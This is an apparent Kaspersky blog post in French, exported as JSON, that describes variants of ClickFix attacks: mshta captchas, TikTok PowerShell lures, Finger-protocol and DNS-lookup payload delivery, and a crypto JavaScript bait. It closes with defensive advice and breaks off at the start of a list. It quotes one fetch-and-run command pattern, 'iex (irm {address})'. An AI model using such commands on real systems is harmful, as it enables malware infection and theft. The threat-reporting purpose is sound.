{"id":23706,"date":"2026-03-13T09:57:05","date_gmt":"2026-03-13T07:57:05","guid":{"rendered":"https:\/\/www.kaspersky.fr\/blog\/?p=23706"},"modified":"2026-03-13T14:02:46","modified_gmt":"2026-03-13T12:02:46","slug":"clickfix-attack-variations","status":"publish","type":"post","link":"https:\/\/www.kaspersky.fr\/blog\/clickfix-attack-variations\/23706\/","title":{"rendered":"Variantes de la technique ClickFix"},"content":{"rendered":"

Il y a environ un an, nous avons publi\u00e9 un article<\/a> sur la technique ClickFix, qui devenait de plus en plus populaire parmi les cybercriminels. Le principe des attaques utilisant la technique ClickFix consiste \u00e0 convaincre la victime, sous divers pr\u00e9textes, d\u2019ex\u00e9cuter une commande malveillante sur son ordinateur. Autrement dit, du point de vue des solutions de cybers\u00e9curit\u00e9, la commande est ex\u00e9cut\u00e9 au nom de l\u2019utilisateur concern\u00e9 et avec ses privil\u00e8ges.<\/p>\n

Lors des premi\u00e8res utilisations de cette technique, les cybercriminels tentaient de convaincre les victimes qu\u2019elles devaient ex\u00e9cuter une commande pour r\u00e9soudre un probl\u00e8me ou un captcha<\/a>, et dans la grande majorit\u00e9 des cas, la commande malveillante \u00e9tait un script PowerShell. Cependant, depuis lors, les pirates informatiques ont trouv\u00e9 une s\u00e9rie de nouvelles ruses, que les utilisateurs devraient conna\u00eetre, ainsi qu\u2019un certain nombre de nouvelles variantes de diffusion de charges utiles malveillantes, qui m\u00e9ritent \u00e9galement d\u2019\u00eatre surveill\u00e9es.<\/p>\n

Utilisation de l\u2019utilitaire mshta.exe<\/em><\/h2>\n

L\u2019ann\u00e9e derni\u00e8re, les experts de Microsoft ont publi\u00e9 un rapport<\/a> sur les cyberattaques visant les propri\u00e9taires d\u2019h\u00f4tels collaborant avec la plateforme Booking.com. Les cybercriminels ont envoy\u00e9 de fausses notifications de la part du service, ou des emails pr\u00e9tendant provenir d\u2019invit\u00e9s attirant l\u2019attention sur une \u00e9valuation. Dans les deux cas, l\u2019email contenait un lien vers une page imitant le site Booking.com, qui demandait \u00e0 la victime de prouver qu\u2019elle n\u2019\u00e9tait pas un robot en ex\u00e9cutant un code via le menu Ex\u00e9cuter.<\/p>\n

Il existe deux diff\u00e9rences essentielles entre cette attaque et la technique ClickFix. La premi\u00e8re consiste \u00e0 ne pas demander \u00e0 l\u2019utilisateur de copier la cha\u00eene (apr\u00e8s tout, une cha\u00eene contenant du code \u00e9veille parfois des soup\u00e7ons). Cette-ci est copi\u00e9e dans la m\u00e9moire tampon d\u2019\u00e9change par le site malveillant, g\u00e9n\u00e9ralement lorsque l\u2019utilisateur clique sur une case \u00e0 cocher qui imite le m\u00e9canisme reCAPTCHA. La seconde consiste \u00e0 ce que la cha\u00eene malveillante appelle l\u2019utilitaire l\u00e9gitime mshta.exe<\/em>, qui permet d\u2019ex\u00e9cuter des applications \u00e9crites en HTML. Elle contacte le serveur des cybercriminels et ex\u00e9cute la charge utile malveillante.<\/p>\n

Vid\u00e9o sur TikTok et PowerShell avec des privil\u00e8ges d\u2019administrateur<\/h2>\n

En octobre\u00a02025, le site BleepingComputer a publi\u00e9 un article<\/a> au sujet d\u2019une campagne visant \u00e0 diffuser des programmes malveillants au moyen d\u2019instructions dans des vid\u00e9os TikTok. Les vid\u00e9os elles-m\u00eames imitent des tutoriels vid\u00e9o indiquant comment activer gratuitement des logiciels propri\u00e9taires. Le conseil qu\u2019elles donnent se r\u00e9sume \u00e0 la n\u00e9cessit\u00e9 de lancer PowerShell avec des privil\u00e8ges d\u2019administrateur, puis d\u2019ex\u00e9cuter la commande iex (irm {address})<\/em>. Ici, la commande irm t\u00e9l\u00e9charge un script malveillant \u00e0 partir d\u2019un serveur contr\u00f4l\u00e9 par les pirates informatiques, et la commande iex<\/em> (Invoke-Expression) l\u2019ex\u00e9cute. Le script, \u00e0 son tour, t\u00e9l\u00e9charge un programme malveillant voleur d\u2019informations sur l\u2019ordinateur de la victime.<\/p>\n

Utilisation du protocole Finger<\/h2>\n

Une autre variante inhabituelle de l\u2019attaque ClickFix reprend<\/a> la m\u00eame technique de captcha, mais le script malveillant utilise le protocole Finger<\/a>, devenu obsol\u00e8te. L\u2019utilitaire du m\u00eame nom permet \u00e0 n\u2019importe qui de demander des donn\u00e9es au sujet d\u2019un utilisateur particulier sur un serveur distant. Le protocole est rarement utilis\u00e9 de nos jours, mais il continue d\u2019\u00eatre pris en charge par Windows, macOS et un certain nombre de syst\u00e8mes bas\u00e9s sur Linux.<\/p>\n

L\u2019utilisateur est encourag\u00e9 \u00e0 ouvrir l\u2019interface de ligne de commande et \u00e0 y ex\u00e9cuter une commande qui \u00e9tablit une connexion via le protocole Finger (en utilisant le port TCP\u00a079) avec le serveur des pirates informatiques. Le protocole transf\u00e8re uniquement des informations textuelles, mais cette op\u00e9ration suffit pour t\u00e9l\u00e9charger un autre script sur l\u2019ordinateur de la victime, qui installe alors le programme malveillant.<\/p>\n

Variante de la technique CrashFix<\/h2>\n

Une autre variante de la technique ClickFix se distingue par l\u2019utilisation d\u2019une ing\u00e9nierie sociale plus \u00e9labor\u00e9e. Cette m\u00e9thode a \u00e9t\u00e9 utilis\u00e9e dans le cadre d\u2019une attaque<\/a> contre des utilisateurs qui tentaient de trouver un outil permettant de bloquer les banni\u00e8res publicitaires, les traqueurs, les programmes malveillants et d\u2019autres contenus ind\u00e9sirables sur les pages Internet. Alors qu\u2019elles cherchaient une extension appropri\u00e9e pour Google Chrome, les victimes ont trouv\u00e9 un module appel\u00e9 NexShield \u2013 Advanced Web Guardian<\/em>, qui \u00e9tait en fait un clone d\u2019un v\u00e9ritable logiciel fonctionnel, mais qui, \u00e0 un certain moment, faisait planter le navigateur et affichait une fausse notification concernant un probl\u00e8me de s\u00e9curit\u00e9 d\u00e9tect\u00e9 et la n\u00e9cessit\u00e9 d\u2019ex\u00e9cuter une \u00ab\u00a0analyse\u00a0\u00bb pour corriger l\u2019erreur. Si l\u2019utilisateur acceptait, il recevait des instructions sur la marche \u00e0 suivre pour ouvrir le menu Ex\u00e9cuter et lancer une commande que l\u2019extension avait pr\u00e9alablement copi\u00e9e dans le presse-papiers.<\/p>\n

La commande copiait le fichier connu finger.exe<\/em> dans un r\u00e9pertoire temporaire, le renommait en \u00ab\u00a0ct.exe\u00a0\u00bb<\/em>, puis le lan\u00e7ait avec l\u2019adresse du pirate. Le reste de l\u2019attaque se d\u00e9roulait de la m\u00eame mani\u00e8re que dans le cas susmentionn\u00e9. En r\u00e9ponse \u00e0 la demande du protocole Finger, un script malveillant \u00e9tait d\u00e9ploy\u00e9, qui lan\u00e7ait et installait un cheval de Troie d\u2019acc\u00e8s \u00e0 distance (dans ce cas, ModeloRAT).<\/p>\n

Diffusion de programmes malveillants via une recherche DNS<\/h2>\n

L\u2019\u00e9quipe Microsoft Threat Intelligence a \u00e9galement partag\u00e9<\/a> une variante d\u2019attaque ClickFix l\u00e9g\u00e8rement plus complexe que d\u2019habitude. Malheureusement, ils n\u2019ont pas d\u00e9crit la technique d\u2019ing\u00e9nierie sociale, mais la m\u00e9thode de diffusion de la charge utile malveillante est plut\u00f4t int\u00e9ressante. Il est probable que, pour compliquer la d\u00e9tection de l\u2019attaque dans un environnement d\u2019entreprise et prolonger la dur\u00e9e de vie de l\u2019infrastructure malveillante, les auteurs de l\u2019attaque ont ajout\u00e9 une \u00e9tape suppl\u00e9mentaire\u00a0: contacter un serveur DNS qu\u2019ils contr\u00f4laient.<\/p>\n

Autrement dit, apr\u00e8s que la victime a \u00e9t\u00e9 persuad\u00e9e de copier et d\u2019ex\u00e9cuter une commande malveillante, une demande est envoy\u00e9e au serveur DNS au nom de l\u2019utilisateur par l\u2019interm\u00e9diaire de l\u2019utilitaire l\u00e9gitime nslookup<\/em>, afin d\u2019obtenir des donn\u00e9es se rapportant au domaine exemple.com<\/em>. La commande contenait l\u2019adresse d\u2019un serveur DNS contr\u00f4l\u00e9 par les cybercriminels. Elle renvoyait une r\u00e9ponse qui, entre autres, contenait une cha\u00eene de caract\u00e8res avec un script malveillant, qui \u00e0 son tour t\u00e9l\u00e9chargeait la charge utile finale (dans cette attaque, le programme malveillant ModeloRAT encore une fois).<\/p>\n

App\u00e2t en cryptomonnaies et JavaScript en tant que charge utile<\/h2>\n

La variante d\u2019attaque<\/a> suivante est int\u00e9ressante en raison de son ing\u00e9nierie sociale en plusieurs \u00e9tapes. Dans des commentaires sur Pastebin, des cybercriminels ont activement relay\u00e9 un message concernant une pr\u00e9tendue faille dans le service d\u2019\u00e9change de cryptomonnaies Swapzone.io<\/em>. Les propri\u00e9taires de cryptomonnaies \u00e9taient invit\u00e9s \u00e0 se rendre sur une ressource cr\u00e9\u00e9e par les escrocs, qui contenait des instructions pr\u00e9cises sur la fa\u00e7on d\u2019exploiter cette faille, qui permettait de rapporter jusqu\u2019\u00e0 13\u00a0000\u00a0dollars en quelques jours.<\/p>\n

Les instructions d\u00e9crivent comment les failles du service peuvent \u00eatre exploit\u00e9es pour \u00e9changer des cryptomonnaies \u00e0 un taux plus avantageux. Pour ce faire, une victime doit ouvrir le site Internet du service dans le navigateur Chrome, taper manuellement \u00ab\u00a0javascript:\u00a0\u00bb dans la barre d\u2019adresse, puis coller le script JavaScript copi\u00e9 sur le site des pirates et l\u2019ex\u00e9cuter. En r\u00e9alit\u00e9, il va de soi que le script ne peut en aucun cas influencer les taux de change. Il se contente de remplacer les adresses des portefeuilles Bitcoin et, si la victime tente bel et bien d\u2019\u00e9changer quelque chose, de transf\u00e9rer les fonds sur les comptes des escrocs.<\/p>\n

Comment prot\u00e9ger votre entreprise contre les attaques ClickFix\u00a0?<\/h2>\n

Les attaques les plus simples utilisant la technique ClickFix peuvent \u00eatre contr\u00e9es en bloquant la combinaison de touches [Win]<\/strong> + [R]<\/strong> sur les appareils de travail. Toutefois, comme le montrent les exemples cit\u00e9s, c\u2019est loin d\u2019\u00eatre le seul type d\u2019attaque dans lequel les utilisateurs sont invit\u00e9s \u00e0 ex\u00e9cuter eux-m\u00eames du code malveillant.<\/p>\n

Le principal conseil est donc de sensibiliser les employ\u00e9s \u00e0 la cybers\u00e9curit\u00e9. Ils doivent clairement comprendre que, si quelqu\u2019un leur demande d\u2019effectuer des manipulations inhabituelles avec le syst\u00e8me, et\/ou de copier et coller du code quelque part, il s\u2019agit dans la plupart des cas d\u2019une ruse utilis\u00e9e par les cybercriminels. Il est possible d\u2019organiser une formation de sensibilisation \u00e0 la s\u00e9curit\u00e9 \u00e0 l\u2019aide de la plateforme Kaspersky Automated Security Awareness Platform<\/a>.<\/p>\n

En outre, pour se prot\u00e9ger contre de telles cyberattaques, nous recommandons\u00a0:<\/p>\n